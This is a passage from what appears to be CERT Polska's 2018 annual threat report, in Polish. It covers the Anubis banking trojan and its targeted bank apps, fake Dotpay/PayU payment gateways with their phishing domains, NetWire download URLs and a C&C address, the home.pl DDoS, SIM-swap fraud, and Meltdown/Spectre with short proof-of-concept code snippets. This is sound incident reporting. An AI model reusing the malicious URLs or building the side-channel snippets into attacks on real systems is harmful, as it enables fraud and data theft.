Analizowany panel Anubisa posiada rozbudowane możliwości kontrolowania zainfekowanych urzą-dzeń. Widzimy w nim typowy dla trojanów bankowych zestaw funkcji, a więc: wykonywanie injectów, przechwytywanie SMS-ów, jak również rejestrowanie sekwencji naciśniętych klawiszy (keylogging).


Panel ma oddzielną sekcję, zajmującą się gromadzeniem danych z kart płatniczych. Widoczne są polecenia charakterystyczne dla narzędzi zdalnego dostępu, takie jak wykonywanie zrzutów ekranu, nagrywanie dźwięku czy rejestrowanie obrazu wyświetlanego na urządzeniu. Możliwe jest wysyłanie poleceń służących ustaleniu geolokalizacji ofiary, jak również pobieranie wpisów z książki adresowej.

Panel dopuszcza możliwość masowego wysyłania SMS-ów, przekierowania połączeń, a także wy-woływania kodów USSD. Istnieje techniczna możliwość pobrania spisu zainstalowanych aplikacji, ich uruchamiania oraz generowania fałszywych powiadomień. W dole listy widoczne jest polecenie Cryptolocker. Anubis to także złośliwe oprogramowanie szyfrujące. Za jego pomocą możliwe jest odbieranie ofiarom dostępu do plików przechowywanych na urządzeniu. Proces szyfrowania jest odwracalny, pod warunkiem znajomości klucza użytego w procesie (ten definiowany jest przez prze-stępcę po wybraniu odpowiedniej opcji w panelu).

Rysunek 41. Widok listy poleceń i konfiguracji bota w panelu Anubis II.

Analizowany wariant bankera, w dniu przeprowadzania analizy posiadał możliwość wykradania da-nych za pomocą nakładek do 185 serwisów. W konfiguracji złośliwego oprogramowania znajdowały się nie tylko aplikacje bankowe, ale również te związane z obsługą poczty elektronicznej, mediów społecznościowych, platform zakupowych czy kryptowalut (wśród nich pojawił się m.in. Gmail, Fa-cebook, Paypal, eBay oraz Amazon). 32 overlay’e dotyczyły polskich banków i usługodawców (lista obsługiwanych aplikacji znajduje się poniżej). Należy pamiętać, że rozbudowane możliwości wykra-dania danych w przypadku Anubisa, nie muszą ograniczać ataku do niżej wymienionych aplikacji. W przypadku zastosowania keyloggera, możliwe jest przechwytywanie danych wpisywanych do do-wolnego okna czy formularza.


com.getingroup.mobilebankingeu.eleader.mobilebanking.pekao.firmeu.eleader.mobilebanking.pekaoeu.eleader.mobilebanking.raiffeisenpl.bzwbk.bzwbk24pl.ipko.mobilepl.mbankalior.bankingapp.androidcom.comarch.mobile.banking.bgzbnpparibas.biznescom.comarch.security.mobilebankingcom.empik.empikappcom.empik.empikfotocom.finanteq.finance.cacom.orangefinanseeu.eleader.mobilebanking.investpl.aliorbank.aibpl.allegropl.bosbank.mobilepl.bphpl.bps.bankowoscmobilnapl.bzwbk.ibiznes24pl.bzwbk.mobile.tab.bzwbk24pl.ceneopl.com.rossmann.centaurospl.fmbank.smartpl.ideabank.mobilebankingpl.ing.mojeingpl.millennium.corpApppl.orange.mojeorangepl.pkobp.ikopl.pkobp.ipkobizneswit.android.bcpBankingApp.millenniumPL

Fałszywestronypośrednikówpłatności

W 2018 r. znacząco nasiliły się ataki wykorzystujące scenariusz z podszywaniem się pod serwisy płatności online, takie jak Dotpay czy PayU. Przestępcy przy użyciu różnych scenariuszy i metod socjotechnych wysyłali do ofiary informację o konieczności dokonania płatności online. Zazwyczaj dotyczyła ona opłaty za przesyłkę kurierską. Sam system był oczywiście fałszywy, stworzony i utrzy-mywany na infrastrukturze przestępców. Jego strona wizualna była identyczna z oryginałem. Nazwy domen, na których znajdował się system, zawierały elementy charakterystyczne, powiązane z płat-nościami, przesyłkami czy firmami kurierskimi i miały na celu uśpienie czujności ofiar. Były to m.in. frazy:

- dotpay, bramka, paybylink, customer, twojaprzesylka, paynow, przelew, platnosc, dpdgroup, ku-rier, vat, paycourier, przesylkadodomu, szybkiprzelew, dpdpoland, oplata, zamowienie, rachunek,dhl-pay, inpost, furgonetka-24, eplatnosci itp.


Fałszywy system płatności wyglądał jak na rysunku 42.

Rysunek 42. Przykład strony podszywającej się pod system płatności online.

Ofiara, po wybraniu banku, wpisaniu imienia, nazwiska, adresu, e-maila i numeru telefonu, była przekierowana na rzekomą stronę banku.

Rysunek 43. Fałszywa strona iPKO.


Rysunek 44. Fałszywa strona ING.

Po podaniu loginu i hasła, przestępcy logowali się na konto ofiary i dodawali szablon przelewu do „zaufanego odbiorcy”. Oczywiście konto bankowe „zaufanego odbiorcy” było w posiadaniu przestęp-ców. Taki przelew można było później wykonywać bez użycia kodów potwierdzających transakcje. W momencie zdefiniowania takiego szablonu, na ekranie ofiary pojawiało się okno z prośbą o po-danie kodu jednorazowego. Fałszywy komunikat informował o płatności przez system dotpay. Jeżeli ofiara nie zwróciła uwagi na treść otrzymanego SMS-a, podawała kod atakującemu. Następnie ata-kujący dokonywał transferu środków z konta ofiary na wskazane konto „zaufanego odbiorcy”.

Opisany proceder rozpoczął się w połowie 2017 r. i trwa do dziś. Na przestrzeni tego czasu rozpozna-no 5 odrębnych grup wykorzystujących opisany powyżej scenariusz. W pierwszej fazie można wyod-rębnić dwie grupy, które zaczęły działalność w podobnym okresie i to im przypisujemy wymyślenie scenariusza. Nazwaliśmy je „Payments” oraz „Dotpay fr”. Później zaczęli pojawiać się naśladowcy.

Grupa „Payments” Pierwszy zgłoszony do CERT Polska incydent związany z grupą „Payments” odnotowaliśmy 6 sierp-nia 2017 r. Dotyczył on domeny bramka.mobi. Jak wynika z późniejszych analiz, pierwsze odnoto-wane ataki miały miejsce już pod koniec maja 2017 r.

Cechy charakteryzujące tę, jak i inne grupy, to specyficzne ścieżki używane w fałszywym systemie płatności. W tym przypadku atakujący najczęściej umiejscawiał strony w katalogu /payments/ np.:

- /payments/interpay/index.php- /payments/twojekonto/index.php- /payments/mtransfer/index.php

Charakterystyczna była także nazwa bazy danych - „gateway” - w której zapisywano wykradzione dane. Strona podszywająca się pod dotpay wyglądała jak na rysunku 42. Dostępne były wszystkie wyświetlane banki.

Ostatnia kampania tej grupy została zaobserwowana 20 grudnia 2017 r. i dotyczyła domeny dosta-wyw24.com.Tego samego dnia na torowym forum „Cebulka” pojawiło się ogłoszenie użytkownika


„Hochwanderek” dotyczące sprzedaży bramki. Wskazane w ogłoszeniu linki jednoznacznie wskazu-ją na bramkę wykorzystywaną przez grupę „Payments”.

Rysunek 45. Ogłoszenie sprzedaży fałszywej bramki płatności.

Grupa „Dotpay fr”

W przypadku tej grupy, pierwszy odnotowany incydent miał miejsce 26 lipca 2017 r. i dotyczył dome-ny dotpay.se. Działa ona niezmiennie od pierwszego zgłoszenia. Na przestrzeni tego czasu zauwa-żalna była pewna ewolucja fałszywej bramki, w związku z czym charakterystyczne ścieżki zmieniały się na przestrzeni czasu.

Na bardzo wczesnym etapie używano schematu:- /new_payment/payments/BANK

Do końca 2017 r.:- /payment35133632/payments772/BANK/

Od początku 2018 r.:- 2291ec1c83a719fce7602b9c1605fc_payment_3de88732a94a7c578/2e9800f81ab50b4fd1_pay-ments_ae9037ed66f85923/BANK/

Pod koniec października 2018 r. pojawił się katalog o losowej nazwie, mający utrudnić znalezienie fałszywej bramki na serwerze:- /c3C/cc119fce7602b9c1605fc_payment_3de88732a94a7c57/- /gga3/cc119fce7602b9c1605fc_payment_3de88732a94a7c57/- /c44a/cc119fce7602b9c1605fc_payment_3de88732a94a7c57/- /uy63CI/cc119fce7602b9c1605fc_payment_3de88732a94a7c57/

W początkowej fazie baza danych miała nazwę „dotpayse_bank” lub „dotpayuk_dotpay”. Później zmieniła się na „dotpay_fr_dotpay” i jest używana do dziś.


W przypadku tej grupy zidentyfikowano kilka fałszywych sklepów, które wysyłały towar zazwyczaj za pobraniem. Płatność dotyczyła przesyłki kurierskiej i odbywała się za pośrednictwem fałszywej bramki. Były to:

• eurortvagd24.pl• pole-henny.com• mojeklocki.com• telecop.in.net

Szczególnie interesujący jest przypadek dotyczący sklepu pole-henny.com, w którym równolegle wykorzystano dwa scenariusze. Pierwszy dotyczył prób kradzieży z wykorzystaniem fałszywej bramki płatności. W drugim następowała próba infekcji ofiary złośliwym oprogramowaniem o nazwie NetWire. Po dokonaniu zamówienia, ofiara otrzymywała drogą mailową rzekomy plik .pdf, zawiera-jący „list przewozowy” bądź „korektę”. Znajdowały się one pod adresami:

• http://dhl-paczki.ml/list_przewozowy_nr.102321312323_2018_07_05.pdf• http://dhl-paczki.ml/korekta2018_07_05.pdf• http://adobedc.cf/korekta2018_07_05.pdf• http://adobedc.cf/list_przewozowy_nr.102321312323_2018_07_05.pdf

W rzeczywistości powodowały one przekierowanie i pobranie złośliwego oprogramowania spod ad-resów:

• http://dhl-paczki.ml/list_przewozowy_nr.102321312323_2018_07_05.pdf/adobe_install.exe• http://dhl-paczki.ml/korekta2018_07_05.pdf/adobeinstall.exe• http://adobedc.cf/korekta2018_07_05.pdf/adobeinstall.exe• http://adobedc.cf/list_przewozowy_nr.102321312323_2018_07_05.pdf/adobe_install.exe

Ich uruchomienie powodowało przejęcie pełnej kontroli nad komputerem ofiary. Serwer C&C znaj-dował się pod adresem 191.96.249.27. Był on powiązany z innymi atakami, np. atakiem dotyczą-cym przejęcia profilu NSZZ Solidarność Stoczni Gdańskiej. Wydaje się, że w tym przypadku grupa „Dotpay fr” nawiązała współpracę z inną grupą przestępczą, odpowiedzialną za infekcje z użyciem NetWire.

Rysunek 46. Schemat dystrybucji NetWire ze sklepu pole-henny.com.


Grupa „nr 3”

Pierwszy incydent dotyczący tej grupy wpłynął do CERT Polska w marcu 2018 r. i dotyczył domeny pajmon.pl. Wiadomo jednak, że grupa działała już na początku 2018 r.

Cechą charakterystyczną jest swoisty „punkt wejścia” do bramki. Jest to pierwszy link, który ma schemat „/?997582=X&kwota=YY.ZZ”. Jeżeli wejście nie następuje przez niego, zwracany jest ko-munikat 404 – brak strony. Dodatkowo atakujący wprowadzili szyfrowanie/zaciemnienie parametrów przekazywanych do bramki, np.:

tid=l41Wte0709CvxjOX4nNqwpKWklJoy9S8%27&gat=U4CqsATwC-2tANmQf&highlo=TLXocyd9YoTe3ExqClr1pHBfsoiniCte461S7CdXe0xzYrzF&-crypt=rItjlipIjiHyLLQ1boqk0J50tQnnzhcR6ml4Tureorg2prZfxC6E6zsxEoDg-ZZwE&newuser=2&tax=nHQg6RAboerETtRT1geOf7HbOgFKkGlITLcZH3eFahBlP4sR-PHl2LZ3SZric03HYRKmXHgLq2&kwota=14.99

Na fałszywej stronie dotpay jest obsługa tylko kilku banków. Reszta jest widoczna, ale niedostępna (wyszarzona), tak jak na rysunku 47.

Rysunek 47. Bramka grupy nr 3.


Osoby odpowiedzialne za tę bramkę były powiązane z włamaniem do sklepu morele.net. Od 22 listopada 2018 r. rozpoczęły się ataki ukierunkowane na klientów dokonujących zakupów we wspo-mnianym sklepie. Pojawiła się też dedykowana bramka.

Rysunek 48. Atak na klientów morele.net (źródło: niebezpiecznik.pl)

Odnotowano kilka domen użytych podczas ataku:

platnosci-morele.onlineplatnosc24.comp-24.siteplatnosci-24.compx24.site

Chwilę wcześniej, 15 listopada 2018 r., użytkownik „playboycarti” opublikował na forum Cebulka ogło-szenie dotyczące fałszywej bramki dotpay. To on jest właścicielem bramki należącej do grupy nr 3.

Rysunek 49. Ogłoszenie „playboycarti”.


Grupa „PayU”

22 listopada 2018 r. pojawiła się nowa grupa realizująca scenariusz identyczny do poprzednich, przy czym podszywała się pod inną bramkę płatności, w tym przypadku PayU. Do końca roku odnotowa-no 10 domen użytych w ataku.

Rysunek 50. Bramka grupy PayU (źródło: zaufanatrzeciastrona.pl).

Grupa „2 min.”

Jest to najmłodsza grupa, odnotowano jeden incydent. 5 grudnia 2018 r. został rozesłany mail pod-szywający się pod Orange Polska, który dotyczył rzekomej zaległej płatności.

Rysunek 51. Zaległa płatność (źródło: niebezpiecznik.pl).


Wyodrębniono 3 warianty wiadomości e-mail. W ich treści zamieszczono linki przekierowujące do fałszywych bramek. Znajdowały się one pod poniższymi adresami:

https://dotpay-platnosc.info/dotpay/index.htmlhttps://orange-faktura-online.info/dotpay/index.htmlhttps://orange-windykacja-dotpay.info/dotpay/index.html

Rysunek 52. Bramka grupy „2 min.”

Na przestrzeni 2018 r. CERT Polska odnotował prawie 180 domen użytych przez powyższe grupy. Każda z nich zawierała fałszywą bramkę. Stanowią one tylko fragment całego procederu. Incyden-tów było zapewne znacznie więcej. Niestety tendencja jest wzrostowa i należy spodziewać się kon-tynuacji i intensyfikacji tego typu ataków w 2019 r.

DDoS na home.pl

24 września doszło do przerwy w dostępie do większości usług świadczonych przez krajowego dostawcę hostingowego, firmę Home.pl. Przyczyną incydentu był atak DDoS skierowany na jego serwery DNS.

Home.pl to krajowy dostawca hostingowy, który według rankigu58 portalu webhostingtalk.pl (nazwa.pl) znajduje się na drugim miejscu pod względem liczby utrzymywanych domen z ponad 15 proc. udziałem w rynku. Dostawca na swojej stronie59 podaje, że z jego usług korzysta 375 tysięcy klien-tów. Poza hostingiem stron, Home.pl oferuje także szereg usług towarzyszących (m.in. webmail,

58 https://top100.wht.pl dostęp w dniu 18.01.2019 59 http://home.pl dostęp w dniu 18.01.2019


certyfikaty SSL, sklepy, projektowanie oraz marketing), w oparciu o które funkcjonuje wiele krajo-wych podmiotów biznesowych. Niedostępność danej nazwy domenowej w internecie jest najczęściej równoznaczna z paraliżem prowadzonej działalności.

23 września w godzinach wieczornych na oficjalnym koncie home.pl w serwisie Twitter60 pojawiła się informacja o problemach związanych z dostępem do wielu usług dostawcy.

Rysunek 53. Informacja o niedostępności usług home.pl (źródło: https://twitter.com/home_pl/status/1044110726275756033).

24 września o godzinie 7.22, na internetowym serwisie wykop.pl, pojawił się wpis o nazwie ‘home.pl nie działa ( ͡° ͜ʖ ͡°)’61, w którym internauci korzystający z usług dostarczanych przez Home.pl sygnali-zowali problemy już od godziny 22:00 dnia poprzedniego. Wątek szybko zyskał wysoką popularność oraz był aktywnie komentowany. Obsłużenie niektórych zapytań DNS przez atakowane serwery sprawiało wrażenie rozwiązania problemu, jednak do godziny 10:00 dnia 24 września infrastruktura dostawcy była sparaliżowana.

Home.pl informował o postępach w rozwiązywaniu problemu za pośrednictwem swoich profili w so-cial media. Z powodu ataku niemożliwe było udzielenie odpowiedzi elektronicznej za pomocą dedy-kowanego formularza. Infolinia telefoniczna także nie była w stanie obsłużyć zapytań w opisywanej sprawie. Dodatkowym wzmocnieniem oddziaływania ataku był fakt, że miał on miejsce z niedzieli na poniedziałek. Dla wielu przedsiębiorców, np. działających w branży e-commerce lub logistyce, jest to czas obsługiwania zapytań nagromadzonych w czasie weekendu. Około południa 24 września, na stronie przeznaczonej dla prasy pojawił się komunikat62 w sprawie opisywanego incydentu. Firma potwierdziła, że doszło do ataku na serwery DNS. Wskazała także, że jego wolumen był najwięk-szym z dotychczas przez nich odnotowanych. Równocześnie zapewniono, że podjęto działania ma-jące na celu przeciwdziałanie podobnym incydentom w przyszłości.

Na prośbę CERT Polska, Home.pl udzielił odpowiedzi na temat przebiegu ataku. Rozpoczął się on w godzinach wieczornych 23 września i z różną częstotliwością nasilenia trwał do 25 września do godziny 3:30. W szczytowym momencie jego siła przekroczyła 50Gbps. Wówczas zabezpieczenia po stronie dostawcy okazały się niewystarczające. Atak miał charakter rozproszony, a jego źródła pochodziły także spoza Polski. Home.pl szacuje, że incydent oddziaływał na około 3 mln internau-tów, którzy w mniej lub bardziej uciążliwy sposób doświadczyli jego skutków.

60 https://twitter.com/home_pl61 https://www.wykop.pl/link/4547075/home-pl-nie-dziala-%CA%96/62 https://homepl.prowly.com/39319-komunikat-w-sprawie-ataku-ddos


Jednym ze znaczących podmiotów dotkniętych opisywanym atakiem była firma Skycash, oferująca możliwość płatności mobilnych. Aplikacja jest szeroko wykorzystywana w Polsce przy zlecaniu płat-ności za bilety komunikacyjne, a także parkingowe. Zarządzający oficjalnym profilem Facebook Sky-cash63 poinformowali, że świadczone przez nich usługi są ściśle związane z dostępnością infrastruk-tury Home.pl, dlatego też do momentu rozwiązania problemu nie było możliwe ich przywrócenie.

Rysunek 54. Informacja o ataku na Home.pl opublikowana na oficjalnym profilu Facebook Sky Cash.

Home.pl ujawnił, że przyczyna wystąpienia opisywanego ataku jest nieznana. Bardzo często tego typu incydenty są poprzedzone próbami żądania okupu w zamian za zaniechanie jego przeprowa-dzenia. W tym przypadku sprawcy nie ujawnili swoich oczekiwań. Home.pl złożył zawiadomienie do prokuratury w tej sprawie.

Ransomware

Ransomware, czyli złośliwe oprogramowanie mające na celu wyłudzenie okupu od użytkownika jest obecnie jednym z najczęściej występujących zagrożeń w cyberprzestrzeni. Zasada działania jest niemal zawsze taka sama - oprogramowanie szyfruje pliki na komputerze ofiary, a następnie żąda wpłaty określonej kwoty na konto atakującego w zamian za klucz niezbędny do ich odszyfrowania.

W 2018 r. obserwowaliśmy głównie aktywność rodzin Gandcrab, GlobeImposter (w nowej wersji 2.0) i Dharma.

63 https://www.facebook.com/skycash/


2018 to również kolejny rok uczestnictwa zespołu CERT Polska w projekcie No More Ransom - międzynarodowej inicjatywie mającej na celu edukację, uświadamianie i pomoc ofiarom wymuszeń.Serwis No More Ransom został założony w 2016 r. przy wspólnym udziale Europolu, National High Tech Crime Unit, Kaspersky Lab i McAfee. Oprócz szeroko zakrojonych akcji informacyjnych, serwis udostępnia narzędzia deszyfrujące do rodzin ransomware’u, w których znalezione zostały błędy w procesie szyfrowania, bądź których klucze szyfrujące udało się przejąć w wyniku śledztwa. W wielu przypadkach daje to ofiarom możliwość odzyskania utraconych danych bez konieczności płacenia pieniędzy przestępcom. Pod koniec grudnia 2018 r. w serwisie No More Ransom znajdo-wały się dekryptory do 94 rodzin złośliwego oprogramowania.

W kwietniu 2018 r. zespół CERT Polska opublikował, dzięki współpracy z Biurem do Walki z Cy-berprzestępczością Komendy Głównej Policji oraz Prokuraturą Okręgową w Warszawie narzędzie deszyfrujące rozprowadzanego w Polsce złośliwego oprogramowania znanego pod nazwami Vor-tex, Polski Ransomware i Flotera. Przejęte klucze pozwalają na odzyskanie plików z komputerów zarażonych w kampaniach obserwowanych w 2017 i 2018 r. Dekryptor można znaleźć pod adresem https://nomoreransom.cert.pl/vortex/

Jest to już czwarta rodzina ransomeware’u, dla której CERT Polska wydał narzędzie deszyfrujące. W 2017 r. powstały podobne rozwiązania dla rodzin CryptoMix, CryptoShield oraz Mole. Opracowa-ne przez CERT Polska dekryptory pozwoliły na pomyślne rozszyfrowanie od kilku do kilkudziesięciu przypadków.

Należy zaznaczyć, że No More Ransom oraz CERT Polska stanowczo odradzają płacenie okupu przestępcom. Nie ma żadnej gwarancji, że po zapłaceniu rzeczywiście uda się odzyskać dane. Może być to spowodowane złymi intencjami twórców złośliwego oprogramowania lub błędami w samym kodzie, które mogą spowodować trwałe i nieodwracalne uszkodzenie plików. Ponadto każdy wpłaco-ny okup wspiera działalność przestępców i utwierdza ich w skuteczności tych działań.

NieodpowiedniozabezpieczonedrukarkiwpolskiejprzestrzeniadresówIP

Na początku listopada 2018 r. zespół CERT Polska otrzymał informacje o incydentach, polegających na nieuprawnionym wykorzystaniu drukarek, znajdujących się w sieciach zgłaszających instytucji. Atakujący wykorzystali w tym wypadku słabe zabezpieczenie urządzeń (dane uwierzytelniające w postaci domyślnego loginu i hasła) oraz ich dostępność w publicznej przestrzeni adresów IP. Każ-dorazowo incydent dotyczył wydrukowania na przejętym urządzeniu, przesłanego przez atakujących dokumentu w liczbie kilkuset egzemplarzy.

Według danych z serwisu Shodan, w dniu sporządzania raportu w Polsce dostępnych było 848 urządzeń zidentyfikowanych w charakterze drukarek, przedstawiających się w internecie za pomocą publicznych adresów IP. Widoczność urządzeń z zewnątrz, dostęp do panelu administratora przy użyciu standardowych danych logowania, a w niektórych wypadkach brak konieczności uwierzy-telniania, czyni z nich atrakcyjny cel dla atakujących. Dostęp do interfejsu zarządzającego, w za-leżności od użytego modelu pozwala zlecać zadania drukowania, pobierać zapisane dokumenty oraz korzystać z innych funkcjonalności, włączając w to wysyłkę poczty elektronicznej i podmianę oprogramowania drukarki. Przejęta drukarka może zostać wykorzystana do dalszej eskalacji ataku, pozwalając na dostęp do innych urządzeń w sieci.


Rysunek 55. Liczba publicznie dostępnych drukarek rozpoznanych w polskich sieciach.

W celu minimalizacji ryzyka zalecamy: ograniczenie widoczności i możliwości logowania do urzą-dzeń z publicznej przestrzeni adresowej, zmianę domyślnych danych uwierzytelniających i stosowa-nie polityki bezpiecznych haseł. Rekomendujemy również korzystanie z wbudowanych przez pro-ducenta mechanizmów bezpieczeństwa, wyłączenie usługi UPnP oraz posiadanie aktualnej wersji firmware’u na urządzeniu.

Technika duplikowania kart SIM

W 2018 roku z kraju docierały liczne informacje na temat przypadków kradzieży pieniędzy z wyko-rzystaniem techniki opartej o wymianę karty SIM (tzw. SIM-swap). Ofiarą padali internauci posiada-jący aktywny dostęp do systemu bankowości internetowej. Noty policyjne wskazywały ponadto, że byli to przedsiębiorcy lub osoby prywatne posiadające znaczące aktywa na rachunkach. Oszustwo wymagało spełnienia pewnych warunków. W pierwszej kolejności atakujący dążył do pozyskania danych dostępowych (login oraz hasło) do systemu bankowości ofiary. W tym celu stosował techni-ki phishingowe, infekcję złośliwym oprogramowaniem lub atak socjotechniczny. Skompromitowane dostępy bardzo często stanowiły również przedmiot handlu tzw. podziemia. W następnym kroku ata-kujący ustalał czy ofiara jest interesującym celem, a także czy kanałem autoryzacji zleceń jest kod SMS. Jeżeli tak, podejmowano próbę nieautoryzowanego przejęcia numeru telefonu poprzez wizytę w salonie operatora telefonii komórkowej.


Prawdopodobnie jednym z pierwszych krajowych przypadków przejęcia numeru dla osiągnięcia ko-rzyści finansowej był ten opisany w 2013 roku64. O niedoskonałości procedur po stronie operatorów telefonii komórkowej już w 2009 roku mówił dziennikarz radiowy65. Jednak wówczas nie było to jesz-cze przedmiotem zainteresowania zorganizowanych grup przestępczych.

Problem okazał się na tyle istotny, że krajowy regulator telekomunikacyjny UKE, wydał ostrzeżenie dla użytkowników, kierując jednocześnie prośbę66 w stronę operatorów o przedsięwzięcie stosow-nych działań. Niestety, punkt sprzedaży gdzie wydaje się duplikat karty, to miejsce gdzie ścierają się grupy przeciwstawnych interesów. Na tę chwilę dostawcom ciągle nie udało się pogodzić spraw-ności procesów obsługi nastawionych prokliencko z zachowaniem wymogów bezpieczeństwa, któ-re mogłyby całkowicie wyeliminować ten szkodliwy proceder. Krajowi dostawcy rozwiązań, których procedury lub systemy pracują w oparciu o uwierzytelnienie za pomocą numeru GSM, nie czekali na reakcję ze strony operatorów i bardzo często wydawali67 własne zestawy rekomendacji w celu ograniczenia nadużyć. Najczęstszą rekomendacją było wykorzystanie alternatywnego sposobu au-toryzacji, za pomocą dedykowanej aplikacji lub tokenu, zamiast SMS-a. Ponadto radzono, aby użyt-kownik zwracał uwagę na wszelkie zdarzenia odbiegające od normy, np. jeżeli urządzenie zostało wyrejestrowane z sieci w miejscu gdzie zwyczajowo zawsze mieliśmy zasięg.

Analizując problem należy rozpatrywać go nie tylko w kwestii kradzieży z systemów transakcyjnych banków. Numer telefonu bardzo często służy jako drugi składnik uwierzytelnienia dla mnóstwa usług naszego życia codziennego. Celem ataku mogą stać się profile w social mediach, skrzynki poczto-we, portale do załatwianie spraw urzędowych. Przedstawiając się konkretnym numerem, a także zestawem niezbędnych danych bardzo często można dokonywać zamówień lub renegocjować kon-kretne umowy. Za granicą68 odnotowano liczne przypadki ataków tego typu na posiadaczy portfeli kryptowalut. Polska policja nie ujawniła kompletnej statystyki związanej z wartością strat wynikają-cych z wykorzystania techniki SIM-swap.

64 https://www.wykop.pl/link/1437103/skradziono-mi-numer-telefonu-w-play-i-jestem-szantazowany-przez-zlodzieja/65 https://web.archive.org/web/20090703194408/http://www.gsmring.pl/?p=7966 https://www.uke.gov.pl/akt/prezes-uke-ostrzega-przed-naduzyciami-z-podmiana-kart-sim,114.html67 https://www.getinbank.pl/klienci-indywidualni/aktualnosci/ostrzegamy-przed-oszustwem-z-wykorzystaniem-duplikatow-kart-sim.html68 https://krebsonsecurity.com/tag/xzavyer-narvaez/


Zdj.

unsp

lash

.com

, Sam

Loy

d


Ataki na nowoczesne procesory (Meltdown i Spectre)

W styczniu 2018 r. ukazały się dwie publikacje naukowe zatytułowane “Meltdown: Reading Kernel Memory from User Space” oraz “Spectre Attacks: Exploiting Speculative Execution”. Zaprezentowa-ne w nich ataki okazały się potężnym ciosem dla producentów procesorów.

Meltdown i Spectre to grupy podatności odkryte niezależnie przez badaczy z Google Project Zero, Cyberus Technology oraz Politechniki w Grazie. Opublikowane prace naukowe powstały w wyniku badania przy użyciu inżynierii wstecznej nowoczesnych procesorów. Eksperci obawiali się, że zbyt daleko posunięte optymalizacje architektury x86 mogą skutkować powstaniem nowych możliwości do nieuprawnionej eksfiltracji danych.

Cache side-channel

Technika przesyłania informacji kanałem bocznym poprzez cache wykorzystuje fakt, że procesor składuje w pamięci podręcznej niektóre dane, normalnie znajdujące się w RAM-ie, aby móc szybciej uzyskać do nich dostęp.

Przy założeniu, że posiadamy tablicę mem[256 * 4096] i uprzednio w całości znajdowała się ona w RAM-ie, po czym dokonano jednego odczytu pod indeksem X * 4096, gdzie 0 ≤ X ≤ 255, możliwe jest odtworzenie wartości X za pomocą następującego programu:

// uzupełniamy tablicę wartościami 0, 1, 2, 3, ..., 255std::iota(std::begin(values), std::end(values), 0);// losowo mieszamy kolejność elementów tablicystd::random_shuffle(values.begin(), values.end()); // szukamy elementu w przypadku którego czas dostępu do pamięci będzie najkrótszyfor (auto ci = values.begin(); ci != values.end(); ++ci) { tstart = __rdtscp((unsigned int*)&junk); junk = mem[*ci * 4096]; tend = __rdtscp((unsigned int*)&junk) - tstart; if (lowest_value == -1 || lowest_value > (int)tend) { lowest_value = tend; best_idx = *ci; }} // wypisujemy wynikstd::cout << „hit on „ << best_idx << „: „ << lowest_value << std::endl;

Cytowany powyżej program uzyskuje dostęp do wszystkich indeksów tablicy [X * 4096] w loso-wej kolejności. Dla każdego dostępu mierzy czas procesora używając instrukcji RDTSCP. Wartość

Wybrane incydenty i zagrożenia ze świata


o najmniejszym czasie dostępu z dużą dozą prawdopodobieństwa jest oryginalną wartością X. Re-ferencyjne implementacje, zarówno Meltdown jak i Spectre, opierają się na takich właśnie spekula-tywnych odczytach dużej tablicy w celu nieuprawnionego odczytu danych przez cache procesora.

Spectre

Nowoczesne procesory x86 dla komputerów PC (Intel, AMD, VIA) i ARM dla smartfonów (Samsung, Qualcomm) posiadają szereg optymalizacji określanych jako możliwość spekulacyjnego wykonania kodu. W dużym uproszczeniu - to usprawnienie zostało wprowadzone, ponieważ koszt wykonania niektórych instrukcji, np. skoku warunkowego, znacznie przewyższał średni czas wykonania instruk-cji. W związku z tym, że współczesne procesory są superskalarne, tzn. w pewnym stopniu mogą wykonywać kilka instrukcji równolegle, producenci wprowadzili rozwiązanie polegające na tym, że procesor niekiedy przewiduje wynik wykonania niektórych z nich i kontynuuje wykonanie programu w trybie spekulatywnym. Przepływy typowych programów bardzo często są przewidywalne, więc zastosowanie takiego rozwiązania znacznie zwiększa odczuwalną wydajność. Konsekwencją opty-malizacji wydajnościowej są jednak liczne luki bezpieczeństwa.

CVE-2017-5754: Bounds Check Bypass69

Jest to jedna z pierwszych odkrytych technik nieuprawnionego dostępu do danych przez nadużycie spekulacyjnego wykonania. Rozważając przykładowy kod:

uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; // +alignuint8_t array2[256 * 512];uint8_t temp = 0; void victimFunction(size_t x) { if (x < array1_size) // (1) temp &= array2[array1[x] * 512]; // (2)}

Funkcję victimFunction(x) można wywołać kilkukrotnie podając wartości x mieszczące się w zakre-sie x < array1_size. Spowoduje to wytrenowanie mechanizmu branch prediction w procesorze, tak że warunek zazwyczaj zostaje spełniony. Kolejne wywołanie funkcji, tym razem z parametrem x spoza zakresu, spowoduje spekulację, że (w uproszczeniu): warunek (1) będzie spełniony, bo z danych historycznych wynika, że zazwyczaj się tak dzieje. Procesor będzie więc równolegle wykonywał (1) oraz spekulatywnie (2). To z kolei spowoduje odczyt tablicy array1 poza zakresem i otworzy możliwość eksfiltracji informacji poprzez tzw. cache side channel.70

CVE-2017-5715: Branch Target Injection71

Innym wariantem podatności należącej do rodziny Spectre jest możliwość wstrzyknięcia dowolnego adresu do Branch Target Buffer (BTB), czyli bufora służącego do przewidywania adresów skoku tzw. skoków pośrednich (ang. indirect jump). Przykładem tego typu instrukcji jest jmp ecx. Procesor pro-wadzi mapę par (klucz instrukcji, ostatni adres skoku), aby móc spekulować wynik takich skoków. Gdzie jako “klucz instrukcji” najczęściej występuje jej adres wirtualny, jego część lub hash.

Jednym z dobrych celów do ataku są biblioteki DLL w systemie Windows, które współdzielone po-między różnymi programami, są podmapowane na tych samych adresach wirtualnych. Oznacza to, że jeden proces, wykorzystując omawianą technikę, mógłby wstrzykiwać złośliwe adresy skoku do BTB. Procesor w tej sytuacji spekulatywnie wykona skok w kontekście innego procesu, który odwoła się do tego samego miejsca w kodzie biblioteki.

69 https://nvd.nist.gov/vuln/detail/CVE-2017-5753 70 https://zaufanatrzeciastrona.pl/post/meltdown-i-spectre-wyjasnione-czyli-hakowanie-procesorow-2-cache-side-channel/ 71 https://nvd.nist.gov/vuln/detail/CVE-2017-5715


Meltdown

Podatność zasięgu Meltdown jest mniejsza, co wynika z faktu, że procesory AMD nie były podatne na ten rodzaj ataku72. Wykorzystanie Meltdowna mogło prowadzić do nieuprawnionego wyprowa-dzenia danych z pamięci jądra systemu z poziomu zwykłej aplikacji wykonywalnej, uruchomionej z konta użytkownika z ograniczonymi uprawnieniami.

CVE-2017-5754: Rogue Data Cache Load73

Zgodnie z proof of concept ataku z oficjalnej publikacji:

; rbx = probe arraymov rax, 0 ; (1)retry:mov al, byte [rcx] ; (2)shl rax, 0xc ; (3)jz retry ; (4)mov rbx, qword [rbx + rax] ; (5)

